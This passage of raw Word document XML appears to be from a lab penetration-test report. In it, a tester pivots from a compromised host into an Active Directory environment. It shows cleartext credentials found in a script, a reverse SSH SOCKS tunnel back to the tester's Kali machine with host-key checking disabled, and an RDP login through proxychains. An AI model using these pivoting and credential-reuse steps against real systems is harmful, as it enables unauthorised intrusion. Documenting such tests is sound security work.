                    <w:t xml:space="preserve">5.1.3 </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Post-Exploitation</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="77E318EA" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>System Proof screenshot:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5E3FC696" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="78DE2E81" wp14:editId="7EAB152D">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>52387</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>635</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5838825" cy="1761490"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="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a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5838825" cy="1761490"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4FB252D1" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>After collecting the proof files and establishing a backdoor using SSH, John began the enumeration of the filesystem for the presence of interesting files. He noticed that there was a mounted share originating from the 10.5.5.20 IP. Inspecting a custom sysreport.ps1 script in the /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>mnt</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>/scripts directory he found cleartext credentials for the “sandbox\</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>alex</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">” user. </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Taking into consideration the type of scripts in this directory and the username structure, it</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> seems that the “Poultry” host is a part of the Active Directory environment.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="071FEC1A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="6EB1628E" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="04586B8B" wp14:editId="4F226147">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>52387</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>635</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5838825" cy="1689100"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>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5"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5838825" cy="1689100"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="08E5BE46" w14:textId="27C1DE5B" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">John began the lateral movement by establishing a reverse dynamic port forwarding using SSH. First, he generated a new pair of SSH keys and added those to the </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>authorized_keys</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> file on his Kali VM, then he just needed to issue a single SSH port forwarding command:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="70C1491C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                    <w:spacing w:after="200"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">└─$ </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>ssh</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">-keygen -t </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>rsa</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -N ‘’ -f ~/.</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>ssh</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>/key</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="421EB487" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                    <w:spacing w:after="200"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">└─$ </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>ssh</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -f -N -R 1080 -o “</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>UserKnownHostsFile</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>=/dev/null” -o “</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>StrictHostKeyChecking</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">=no” -I key </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId46">
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="22"/>
                      </w:rPr>
                      <w:t>kali@192.168.119.164</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w14:paraId="3F18B943" w14:textId="537C2033" w:rsidR="00177B5C" w:rsidRPr="00177B5C" w:rsidRDefault="00000000" w:rsidP="00177B5C">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>With the dynamic reverse tunnel established, John only needed to edit the /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>etc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>proxychains.conf</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> to use the port 1080.</w:t>
                  </w:r>
                  <w:bookmarkStart w:id="20" w:name="_1y810tw" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="20"/>
                </w:p>
                <w:p w14:paraId="1A9BFC42" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading2"/>
                    <w:widowControl w:val="0"/>
                    <w:numPr>
                      <w:ilvl w:val="1"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                  </w:pPr>
                  <w:r>
                    <w:t>5.2 Poultry – 10.5.5.20</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6D2921CD" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="21" w:name="_4i7ojhp" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="21"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>5.2.1 Initial Access – RDP login</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5E02ADA8" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="27CCED5C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Steps to reproduce the attack:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> with the credentials at hand and a reverse tunnel established, John connected to an RDP session using </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>proxychains</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> accepting the certificate when prompted and entering the retrieved password afterward.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7BBAA867" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                    <w:spacing w:after="200"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">└─$ </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>proxychains</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>xfreerdp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>d:sandbox</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>u:alex</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /v:10.5.5.20 +clipboard</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="42DB6A48" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:keepLines w:val="0"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="22" w:name="_2xcytpi" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="22"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">5.2.2 </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Post-Exploitation</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="76893787" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Local Proof Screenshot:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="09241B0D" w14:textId="5943DB00" w:rsidR="00CB67CB" w:rsidRDefault="00177B5C">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="1B357CB3" wp14:editId="6DFD8F81">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>0</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>428625</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5838825" cy="4493895"/>
                        <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>
                        <wp:docPr id="2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7"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5838825" cy="4493895"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                        <wp14:sizeRelH relativeFrom="margin">
                          <wp14:pctWidth>0</wp14:pctWidth>
                        </wp14:sizeRelH>
                        <wp14:sizeRelV relativeFrom="margin">
                          <wp14:pctHeight>0</wp14:pctHeight>
                        </wp14:sizeRelV>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2089924B" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:keepNext/>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="58BE0C54" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:keepNext/>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="23" w:name="_1ci93xb" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="23"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">John noticed the presence of the Thunderbird program on the user’s desktop, and while checking Alex’s </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>inbox he found the email from a local administrator Roger:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="52DEF721" wp14:editId="4EBB7ECF">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>-4444</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>488950</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5838825" cy="3204210"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>
                        <wp:docPr id="2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a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5838825" cy="3204210"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0DEBDE7E" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:pStyle w:val="Heading2"/>
                    <w:widowControl w:val="0"/>
                    <w:numPr>
                      <w:ilvl w:val="1"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                  </w:pPr>
                  <w:bookmarkStart w:id="24" w:name="_klm0kfzc02aa" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="24"/>
                </w:p>
                <w:p w14:paraId="2CC3316F" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading2"/>
                    <w:widowControl w:val="0"/>
                    <w:numPr>
                      <w:ilvl w:val="1"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                  </w:pPr>
                  <w:bookmarkStart w:id="25" w:name="_3whwml4" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="25"/>
                  <w:r>
                    <w:t>5.3 DC – 10.5.5.30</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="574C48DD" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:before="0" w:after="240" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="26" w:name="_2bn6wsx" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="26"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>5.3.1 Initial Access – Remote Commands Execution</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="24942273" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Steps to reproduce the attack:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> John was able to reuse a temporary password that the administrator left for Alex.</w:t>
